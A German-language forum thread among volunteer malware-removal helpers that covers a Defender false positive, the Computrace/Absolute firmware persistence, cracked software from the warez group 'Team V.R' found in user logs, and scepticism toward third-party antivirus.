Immer mehr deutsche Firmen klagen über Einbrüche in IT-Systeme und das unberechtigte Kopieren von Daten. Die Angreifer werden immer professioneller.

Laut dem Ergebnis einer Studie des Digitalverbands Bitkom kosten Cyberattacken und der Diebstahl von IT-Ausrüstung die deutsche Wirtschaft in den vergangenen Monaten 203 Milliarden Euro. 2021 waren es sogar 223 Milliarden Euro.
[sarkasmus]Vorbeugende Sicherheitsmaßnahmen scheinen aber sehr viel mehr zu kosten, sonst würde man ja vielleicht mal darüber nachdenken, dafür/dagegen was zu tun.[/sarkasmus]

https://www.heise.de/forum/heise-onl...41544159/show/
Zitat:

Zitat von Kommentar
Der Kopf des Fisches...

Naja, wenn das irgendwann zu der Erkenntnis führen würde, dass eigene Admins mit guter Aus- und Fortbildung nicht die erste Stellschraube zur Gewinnsteigerung durch Personalabbau sind, dann wäre schon viel gewonnen.

usw...


webwatcher 04.09.2022 15:17

Zitat:

Seit heute morgen meldet der Windows Defender immer wieder den Fund Behavior:Win32/Hive.ZY. Es wird zwar entfernt, wird aber immer wieder neu entdeckt.
zeitgleich weltweit in Foren/Boards aufgeschlagen
https://www.google.de/search?q=Behav...client=gws-wiz

https://answers.microsoft.com/en-us/...f-117d688caf91
Zitat:

EDIT: After some more digging about on the internet, this appears to be a false positive from today's updated definitions.
https://www.reddit.com/r/computervir...orwin32hivezy/

https://www.borncity.com/blog/2022/0...e-zy-4-9-2022/
Zitat:

English]Kurzer Hinweis für Windows-Nutzer, die am Sonntag (4.9.2022, ca. 12:00 Uhr deutscher Zeit) vom Microsoft Defender mit einem Virenfund auf ihrem System aufgeschreckt werden. Seit wenigen Stunden meldet der Microsoft Virenscanner einen Behaviour:Win32/Hive.ZY als Fund. Das ist aber wohl ein falscher Alarm – könnte auf den Microsoft Edge zurückzuführen sein – und trendet momentan in Foren.
:rofl::rofl::rofl:

Google scheint für viele unbekannt zu sein

stefanbecker 04.09.2022 20:38

Zitat:

Zitat von webwatcher (Beitrag 1768037)
Google scheint für viele unbekannt zu sein

Hab das mal bei Google eingegeben, weil ich nicht wusste, was das ist :)

webwatcher 05.09.2022 12:49

https://winfuture.de/news,131656.html
Zitat:

Behaviour:Win32/Hive.ZY: Defender nervt mit ständiger Falschmeldung
Windows-Nutzer melden aktuell eine nicht mehr zu stoppende Flut von falsch-positiven Meldungen des Defenders. Jedes Mal, wenn eine Chromium-basierte Browser- oder Electron-basierte App geöffnet wird, erscheint dann "Behavior:Win32/Hive.ZY".
Die Meldungen erscheinen schneller als man sie lesen kann, berichtet einer der Betroffenen im Microsoft Answers-Forum. Aber auch bei Reddit, Hardware-Hersteller- und Website-Foren häufen sich seit Kurzem die Berichte über die ständigen Alarm-Meldungen des Defenders.

Dadurch sind einige Systeme stark beeinträchtigt: Ein Nutzer schrieb zum Beispiel, dass seine Internetverbindung ständig weg ist, da der Defender versucht, nach seiner falschen Entdeckung die vermeintliche Malware am Kontaktversuch mit einem Server zu hindern.

https://www.heise.de/news/Win32-Hive...eitrag.beitrag
Zitat:

Win32/Hive.ZY: Update stoppt Fehlalarmserie von Microsoft Defender unter Windows

Die Windows-Virenabwehr Defender hat fälschlicherweise Chrome, Edge & Co. als Trojaner eingestuft.

webwatcher 25.09.2022 14:34

https://www.trojaner-board.de/199203...ml#post1736666

Zitat:

Maßnahmen zur Absicherung des Rechners
1. Windows
Alle systemrelevanten Empfehlungen beziehen sich auf Windows 10 (Version 21H2) mit Microsoft Defender als Antivirus-Software.
Sollte mal aktualisiert werden

cosinus 25.09.2022 14:41

Zitat:

Zitat von webwatcher (Beitrag 1768576)
Sollte mal aktualisiert werden

Warum? Was ist denn an Windows 10 21H2 so fürchterlich alt? :confused:

Zuschauer 25.09.2022 15:44

inzwischen soll gerüchteweise sowas wie Windows 11 geben....

cosinus 25.09.2022 16:39

Ja. Und? Nochmal: was ist an Windows 10 21H2 so fürchterlich alt? Es ist das aktuelle Release von Windows 10.

Da steht auch nirgends, dass diese Empfehlungen nicht für Windows 11 gedacht sind.

webwatcher 25.09.2022 17:00

Bei dem Durchnitts-IQ der Hilfesuchenden kommt garantiert mal die Frage, ob das auch für Windows 11 gilt und daher mein Hinweis.

Mit dem Updatelevel hat das nichts zu tun, den kennen die meisten eh nicht.

M-K-D-B 25.09.2022 18:18

Zitat:

Zitat von cosinus (Beitrag 1768579)
Ja. Und? Nochmal: was ist an Windows 10 21H2 so fürchterlich alt? Es ist das aktuelle Release von Windows 10.

Da steht auch nirgends, dass diese Empfehlungen nicht für Windows 11 gedacht sind.

Hab Windows 11 hinzugefügt, wobei ich nicht weiß, ob die Menüführung genau die Gleiche ist.

cosinus 25.09.2022 18:49

Danke. Die grundsätzlichen Sicherheitshinweise sind ja allgemein und auch für Windows 11 gültig/notwendig.

webwatcher 27.09.2022 11:18

Im Grunde trifft die Bezeichnung Hacker nur für einen kleinen Teil der Verbrecherbande zu z.B Brute-Force-Angriffe.

Auf den größten Teil würde eher die Bezeichnung Trapper = Fallensteller passen. Es werden Fallen aufgestellt (z.B. Emailanhänge) in die unbedarfte User tappen und damit Tür und Tor für die Gangster öffnen.

_698 07.10.2022 22:55

https://www.trojaner-board.de/205287-windows-10-zeigt-weisses-fenster-hacker-instruktionen-statt-login.html
Interessante Kiste mit der Absolute Backdoor.

Ärgerlich für Helfer ist dieser offenbar übersehene pico_activator_xyz-Eintrag:
2022-09-24 09:27 - 2020-02-25 00:31 - 000003206 _____ C:\Users\Public\Desktop\R@1n.txt

cosinus 07.10.2022 22:57

Zitat:

Zitat von _698 (Beitrag 1768773)
https://www.trojaner-board.de/205287-windows-10-zeigt-weisses-fenster-hacker-instruktionen-statt-login.html
Interessante Kiste mit der Absolute Backdoor.

Ärgerlich für Helfer ist dieser offenbar übersehene pico_activator_xyz-Eintrag:
2022-09-24 09:27 - 2020-02-25 00:31 - 000003206 _____ C:\Users\Public\Desktop\R@1n.txt

r@in erinnert mich eher an irgendwelche Cracks/Keygens bzw die Auswirkungen davon. :balla:
Danke für den Hinweis. MKDB wird entsprechend reagieren.

Diese Kiste ist eh nicht zu retten. Gebrauchtgerät, nicht neu installiert. Wer weiß ob die Angaben überhaupt alle richtig sind.

_698 07.10.2022 23:12

Zitat:

Zitat von cosinus (Beitrag 1768774)
r@in erinnert mich eher an irgendwelche Cracks/Keygens

Das ist die Windows/Office-Geschichte.
Zitat:

Zitat von cosinus (Beitrag 1768774)
Danke für den Hinweis.

Gerne.

cosinus 07.10.2022 23:20

KMS? Ja da tut sich was in meinen Gehirnwindungen Mr Doe :)

M-K-D-B 08.10.2022 09:23

Zitat:

Zitat von _698 (Beitrag 1768773)
Ärgerlich für Helfer ist dieser offenbar übersehene pico_activator_xyz-Eintrag:
2022-09-24 09:27 - 2020-02-25 00:31 - 000003206 _____ C:\Users\Public\Desktop\R@1n.txt

Den Eintrag hatte ich nur ganz kurz zur Kenntnis genommen... quasi überflogen.
Wusste anfangs allerdings nicht, ob Absolute vom Nutzer installiert wurde oder nicht, das Thema hat mich neugieirg gemacht.

Habe mir in der Zwischenzeit ein paar Beiträge zu "Absolute Backdoor" durchgelesen.
Allerdings steht dort u. a. dass es sich dabei um UEFI-Modifikationen handelt, die nicht so einfach zu entfernen sind (Firmware Update bzw. von Absolute entfernen lassen).
Folglich ist wohl auch eine Neuinstallation von Windows nicht zielführend, verstehe ich das richtig?
https://www.youtube.com/watch?v=AKmNf-JmjKQ
https://threatpost.com/millions-of-p...door-2/107700/


Zitat:

Zitat von cosinus (Beitrag 1768774)
r@in erinnert mich eher an irgendwelche Cracks/Keygens bzw die Auswirkungen davon. :balla:
Danke für den Hinweis. MKDB wird entsprechend reagieren.

Diese Kiste ist eh nicht zu retten. Gebrauchtgerät, nicht neu installiert. Wer weiß ob die Angaben überhaupt alle richtig sind.

Will noch einen kurzen Blick auf das System im normalen Modus erhaschen. ;)

cosinus 08.10.2022 16:30

Zitat:

Zitat von M-K-D-B (Beitrag 1768777)
Habe mir in der Zwischenzeit ein paar Beiträge zu "Absolute Backdoor" durchgelesen.
Allerdings steht dort u. a. dass es sich dabei um UEFI-Modifikationen handelt, die nicht so einfach zu entfernen sind (Firmware Update bzw. von Absolute entfernen lassen))

Was für Modifikationen werden denn da vorgenommen? Den Artikel und das Video find ich etwas zu lag grade :eek:

_698 09.10.2022 21:36

Zitat:

Zitat von M-K-D-B (Beitrag 1768777)
Habe mir in der Zwischenzeit ein paar Beiträge zu "Absolute Backdoor" durchgelesen.
Allerdings steht dort u. a. dass es sich dabei um UEFI-Modifikationen handelt, die nicht so einfach zu entfernen sind (Firmware Update bzw. von Absolute entfernen lassen).

Auf jeden Fall Absolute Software kontaktieren und als Workaround den guten alten Dummy-Trick versuchen.
Zitat:

the most reliable way to disable unauthorized or erroneously activated persistence is to kill Computrace processes,
make zero-sized files rpcnetp.exe, rpcnetp.dll in System32 and SysWOW64, and set System file attributes.
You can reboot and remove the rest of Computrace files (see Appendix A for full file list).
https://www.blackhat.com/docs/us-14/materials/us-14-Kamluk-Computrace-Backdoor-Revisited-WP.pdf
Zitat:

Zitat von M-K-D-B (Beitrag 1768777)
Folglich ist wohl auch eine Neuinstallation von Windows nicht zielführend, verstehe ich das richtig?

Ja.

cosinus 10.10.2022 14:28

Interessant fände ich das aber schon, ob nach der Neuinstallation von Windows ohne vorher das BIOS neu zu flashen, diese Software immer wieder neu raufkommt von allein.

Und auch was passiert, wenn man das BIOS so lässt und ein Linux installiert. Dieses Gerät hätte ich jetzt gern :)

M-K-D-B 10.10.2022 14:33

Glaube ich dir gerne.

Meine Empfehlung an den TO ist raus. Was daraus gemacht wird, liegt nicht bei uns.

_698 10.10.2022 19:48

Das
Zitat:

Zitat von _698 (Beitrag 1768790)
Auf jeden Fall Absolute Software kontaktieren

sollte meiner Meinung nach Priorität haben, um die Angelegenheit rechtlich abzuklären.

cosinus 10.10.2022 20:51

Zitat:

Zitat von M-K-D-B (Beitrag 1768818)
Glaube ich dir gerne.

Meine Empfehlung an den TO ist raus. Was daraus gemacht wird, liegt nicht bei uns.


Absolute schreibt:

Zitat:

Absolute ist immer in der Lage zur Selbstheilung – selbst wenn die Festplatte ausgetauscht oder ein neues Image aufgespielt wurde. Egal was – Absolute installiert sich selbst neu bei der nächsten Bootsequenz.
Damit ist die Frage, was bei einer Windows-Neuinstallation passiert, nun wirklich geklärt. Wäre jetzt noch interessant, die es im Detail aussieht, ist die komplette Software in der Firmware/BIOS oder sorgt die nur dafür, dass beim nächsten Gang ins Internet alles runtergeladen und installiert wird.

Und wie es unter Linux aussieht, wäre noch offen...

cosinus 12.10.2022 09:00

Ob das unter Linux funktioniert, konnte ich nun herausfinden --> https://unix.stackexchange.com/quest...x-like-systems


Zitat:

Computrace CANNOT work on a Linux system. Even if it's enabled and triggered by Absolute Software it will never activate unless a Windows based OS is installed on the hard drive.

Computrace relies on injecting itself into autochk.exe to receive commands and start. Even if the BIOS module is active and triggered before the Linux OS is installed it cannot operate as its communications with the C&C server is handled by a modified Windows component that is planted into the install. Without this component computrace is as good as dead.

You can read up on it here, [PDF] Absolute Backdoor Revisited.

_698 12.12.2022 21:49

https://www.trojaner-board.de/205517-virus-erkannt.html

Guten Abend,
die Situation ist etwas diffus.

Woher kommt das
FreeProgsSetup (HKLM-x32\...\{65AA057B-CF05-479E-8D3B-1904E5E11990}) (Version: 1.0.0 - FreeProgsSetup)
?

Eindeutig dagegen ist, dass das
HalfTime 1.0.1 (HKLM\...\HalfTime_is1) (Version: 1.0.1 - CableGuys & Team V.R)
gecrackt ist.
Gerade mal nachgeschaut.
Das Ding kostet legal 10€.

Das folgende Programm, ebenso gecrackt, ist aber offensichtlich deutlich teurer.
Anymix Pro VST3 version 1.6.3 (HKLM\...\Anymix Pro VST3_is1) (Version: 1.6.3 - Team V.R)

webwatcher 12.12.2022 21:58

möglicherweise von solchen o.ä. Latrinenseiten
https://free4pc.org/

webwatcher 01.01.2023 17:35

Paßt auch hier:
https://www.borncity.com/blog/2011/0...-jahrhunderts/
Zitat:

Tuning-Tools, die Plage des 21. Jahrhunderts?
Publiziert am 19. März 2011 von Günter Born
12 Jahre und es hat sich bis heute nichts geändert eher noch schlimmer

Und die Moral von der Geschicht:
Zitat:

Tuning Tools sind gut für den Anbieter, aber schlecht für den Geldbeutel des Anwenders. Unter dem Strich lautet mein Fazit: Nicht empfehlenswert bzw. Finger weg. Wer sich aber unbedingt Probleme ins Haus holen will, möge zu den kostenlosen Goodies, die auf Begleit-DVDs von ComputerBild, PC Welt & Co. verteilt werden, greifen.

Kronos60 01.01.2023 18:03

Zitat:

Tuning Tools sind gut für den Anbieter, aber schlecht für den Geldbeutel des Anwenders
Dem kann ich nur vollinhaltlich zustimmen.
Aber man kann argumentieren wie man will, es werden sich immer welche finden, die an solche Wundertools glauben.
Da helfen keine Tatsachen, Argumente.
Ist fast wie eine Religion oder noch besser eine Sekte.

Mein PC läuft flüssig, Autostart, Datenträgerbereinigung usw. sind in Windows bereits enthalten.
Da gibt es nichts zu verbessern.

Wenn man mit dem PC zocken will, braucht man halt dementsprechend eine starke Grafikkarte einen starken Prozessor und RAM.

Da helfen keine Tuningtools.

schlawack 01.01.2023 21:01

Jetzt wartet doch mal ab bis cosinus das Tool getestet hat das BeRealm hier vorgestellt hat und was er dann dazu meint.

_698 16.01.2023 22:30

https://www.trojaner-board.de/205907-hxoutlook-exe-msedgewebview2-verdacht-trojaner-malware-r2io3x4-rar-etc.html

Guten Abend,
das

Antares Auto-Tune bundle (HKLM\...\Antares Auto-Tune bundle_is1) (Version: 9.1.0 - Antares & Team V.R)
Antares Auto-Tune Pro (HKLM\...\Antares Auto-Tune Pro_is1) (Version: 10.0.0 - Antares & Team V.R)
Valhalla DSP bundle 2022.11 (HKLM\...\ValhallaDSP bundle_is1) (Version: 2022.11 - Valhalla DSP, LLC & Team V.R)

sind gecrackte Versionen.

M-K-D-B 17.01.2023 21:49

War mir zuerst nicht ganz sicher... hab nochmal recherchiert, sieht nicht wirklich sauber aus.
Danke.

_698 18.01.2023 23:50

Gern geschehen.
Das Schema der Einträge ist einfach:
Hersteller der Software & Team V.R(das ist die warez group).

_698 08.05.2023 23:50

https://www.trojaner-board.de/206734-task-nafifas.html

Der Task passt zu den RATs.

Eine übliche Warez-Kiste(u.a. Team V.R) halt.
Wir müssen eine ethisch/moralische oder auch juristische Debatte gar nicht führen.
Wer einen Rechner nutzt, braucht ein Sicherheitskonzept, und da verbietet sich der Einsatz solcher Software.

cosinus 09.05.2023 02:06

Zitat:

Zitat von _698 (Beitrag 1774165)
https://www.trojaner-board.de/206734-task-nafifas.html

Der Task passt zu den RATs.

Eine übliche Warez-Kiste(u.a. Team V.R) halt.


Hab die Logs von dem noch nicht gesichtet. Aber ich hatte sowas geahnt.
Und dann sind's auch noch genau solche Typen, die Angst vor Microsoft haben, aber kein Problem in Warez sehen :headbang:

webwatcher 09.05.2023 11:14

Zitat:

Zitat von cosinus (Beitrag 1774167)
Und dann sind's auch noch genau solche Typen, die Angst vor Microsoft haben, aber kein Problem in Warez sehen :headbang:

Wovor haben die eigentlich so ein panische Angst? dass jemand die Größe von dem, was sie in der Unterhose rumbaumeln haben, rauskriegt und ihnen Spam für Vergrößerungsgläser schickt?

_698 10.05.2023 19:23

Ja, das Verhalten des "Hilfesuchenden" ist bemerkenswert.

Das Folgende ebenso:
Zitat:

Virus
Zitat:

Virus
Zitat:

Virus
Zitat:

Sality.Virus.FileInfector.DDS, C:\USERS\MICHAEL\DOWNLOADS\DEFENDER CONTROL\DCONTROL.EXE, Keine Aktion durch Benutzer, 1000002, 0, 1.0.69235, 6802876DD9B155746B89AE14, dds, 02288192, 0A50081A6CD37AEA0945C91DE91C5D97, 6606D759667FBDFAA46241DB7FFB4839D2C47B88A20120446F41E916CAD77D0B
Endlich mal ein Thread mit einem echten bösen Virus?
Nein, lediglich MBAM-Unsinn:
https://www.virustotal.com/gui/file/6606d759667fbdfaa46241db7ffb4839d2c47b88a20120446f41e916cad77d0b

M-K-D-B 10.05.2023 21:19

Zitat:

Zitat von _698 (Beitrag 1774165)
Der Task passt zu den RATs.

Ja, das schon.
Aber ich persönlich fand z. B. andere Tasks viel interessanter. :)

webwatcher 11.08.2023 16:30

Das größte Risiko ist mit großem Abstand der Mensch ob per Mail oder simples Bequatschen am Phone
https://www.golem.de/news/junge-hack...08-176689.html
Zitat:

Wie Ars Technica berichtet, zeichneten sich die Lapsus$-Hacker weniger durch besondere technische Fertigkeiten als vielmehr durch ein hohes Maß an Kreativität aus, um Sicherheitsmaßnahmen wie Multi-Faktor-Authentifizierungen (MFA) gezielt zu umgehen. Insbesondere im Umgang mit Social Engineering sollen sich die kriminellen Akteure als besonders talentiert erwiesen haben. Dadurch sei es ihnen möglich gewesen, Mitarbeitern ihrer Zielunternehmen zum Beispiel durch trickreiche Anrufe sensible Informationen zu entlocken und sich damit Zugang zu deren Systemen zu verschaffen, ohne auf ungepatchte 0-Day-Schwachstellen angewiesen zu sein.

Obwohl die Hackergruppe zum Zeitpunkt ihrer prominentesten Angriffe erst seit etwas mehr als einem Jahr aktiv war, konnte sie unter anderem rund ein Terabyte an Unternehmensdaten von Nvidia stehlen, beinahe in das Content-Delivery-Network von Cloudflare eindringen sowie geschützte Daten von Microsoft und dem Single-Sign-On-Anbieter Okta erbeuten und veröffentlichen

webwatcher 19.09.2023 19:58

Ein flammneuer Stern am Himmel der Third Party AV Schrottsoftware
In den Himmel gelobt von den bekannten Verdächtigen

https://www.superantispyware.com/

Impressum?
Zitat:

SUPERAntiSpyware
c/o RealDefense
150 S Los Robles Ave
Suite 400
Pasadena, CA 91101
haben noch mehr auf Lager
https://www.stopzilla.com/

Ein ganze Warenlager an Schrottsoftware

cosinus 19.09.2023 21:22

Superantispyware gibt es doch schon ewig. Das hatten wir ne zetlang sogar in Nutzung. Ist aber schon ewig her, weil es wurde dann überflüssig.

webwatcher 20.09.2023 11:37

Unter der Briefkastenadresse werden weitere Virenvernichter angeboten. Anfang August taucht der Laden wieder groß in der Computerboulevarpresse auf (updatet 3.August 2023) und wird identisch mit "super" bewertet und verbreitet damit weiter den Leitspruch "Hirn aus, AV an"

Kann man glauben oder nicht. Würde mir jedenfalls kein Programm eh schon gar nicht Third Party AV auf den PC laden, von dem der Hersteller de facto anonym ist.
Wer garantiert, dass das Teil wirklich nur Virenbekämpfer isti?

gegründet 2004 https://www.mobygames.com/person/13017/nick-skrepetos/

ob der heute noch dabei ist nicht klar

_698 23.11.2023 17:07

https://www.trojaner-board.de/207872-hackerangriff-trojanervirus.html
Die Mail ist natürlich Scam.

Wirklich bemerkenswert im Zusammenhang ist das
Zitat:

Zitat von Ticro
Die Sache hat mich in große Not gebracht, da ich auf meinem Computer so wichtige Daten habe, dass ein Verlust dieser Daten meine Lebensgrundlage und mein Einkommen, eigentlich mein ganzes Leben zunichte machen würden.

Zitat:

Zitat von cosinus
Und da DEINSTALLIERST du alles, was gecrackt oder illegal freigeschaltet wurde.

Dazu gehören auch die Team V.R-Einträge, und wer weiß, was sonst noch.

cosinus 23.11.2023 22:05

Jo, danke für den Hinweis. An Team V.R hatte ich eben garnicht gedacht.

webwatcher 26.11.2023 22:14

Where have all the Viren gone....

https://www.youtube.com/watch?v=B_-AmLxDPYs

https://www.youtube.com/watch?v=YN6dm-WbPkY

Mal unter uns Betschwestern: groß ist der Andrang von Hilfesuchenden nicht mehr

_698 17.01.2024 22:14

https://www.trojaner-board.de/208171-jpeg-langem-namen-laesst-loeschen.html#post1778571

Dass Team V.R-Einträge jetzt mit einem attention-Hinweis gekennzeichnet werden, ist gut.

Das
Sphere version 1.0 (HKLM\...\Sphere_is1) (Version: 1.0 - Sonicbits) <==== ACHTUNG
allerdings erschließt sich mir nicht.

Davon ab:
2023-12-17 14:47 - 2023-12-17 14:54 - 000000000 ____D C:\Users\tmartus\Desktop\Crusader.Kings.III.RePack.by.Chovka

M-K-D-B 18.01.2024 16:58

Zitat:

Zitat von _698 (Beitrag 1778620)
Dass Team V.R-Einträge jetzt mit einem attention-Hinweis gekennzeichnet werden, ist gut.

Das scheint mir eher eine generische Erkennung zu sein.

Illegale Software wird von FRST nicht markiert.




Zitat:

Zitat von _698 (Beitrag 1778620)
Das
Sphere version 1.0 (HKLM\...\Sphere_is1) (Version: 1.0 - Sonicbits) <==== ACHTUNG
allerdings erschließt sich mir nicht.

Könnte ein FP sein, habs gemeldet.

_698 19.01.2024 00:34

Zitat:

Zitat von M-K-D-B (Beitrag 1778633)
Das scheint mir eher eine generische Erkennung zu sein.

Illegale Software wird von FRST nicht markiert.

Warez gehen mit einem Risiko von Malware einher, ansonsten ergibt auch diese FRST-Kennzeichnung keinen Sinn.

webwatcher 21.01.2024 09:02

https://www.borncity.com/blog/2017/0...ofts-produkte/

Zitat:

Die Empfehlung eines Mozilla-Entwicklers lautet, unter Windows die Virenscanner von Fremdherstellern zu deinstallieren und auf Microsofts Lösungen (Microsoft Security Essentials, Windows Defender etc.) zu setzen.

Das ist wieder eine Breitseite gegen die Zunft der Anbieter von Sicherheitssoftware (Antivirus-Software und Internet Security Suites). Gut, ich hatte hier im Blog ja bereits mehrfach zu diesem Thema was veröffentlicht (siehe Link-Liste) und auch begründet, warum Fremdvirenscanner unter Windows 10 zum Problem werden (können).
geht doch runter wie Öl

cosinus 21.01.2024 14:59

Der Artikel ist sieben Jahre alt :wtf: :confused:

webwatcher 21.01.2024 16:52

Na und? sind Third Party AV seitdem besser geworden?

cosinus 21.01.2024 17:21

Nicht unbedingt. Aber es gibt ja sowas wie Malwarebytes, das passt recht gut als Ergänzung zum Windows Defender.
Im Büro nutzen wie Sophos Intercept. Ist aber auch schweineteuer.


Alle Zeitangaben in WEZ +1. Es ist jetzt 04:37 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55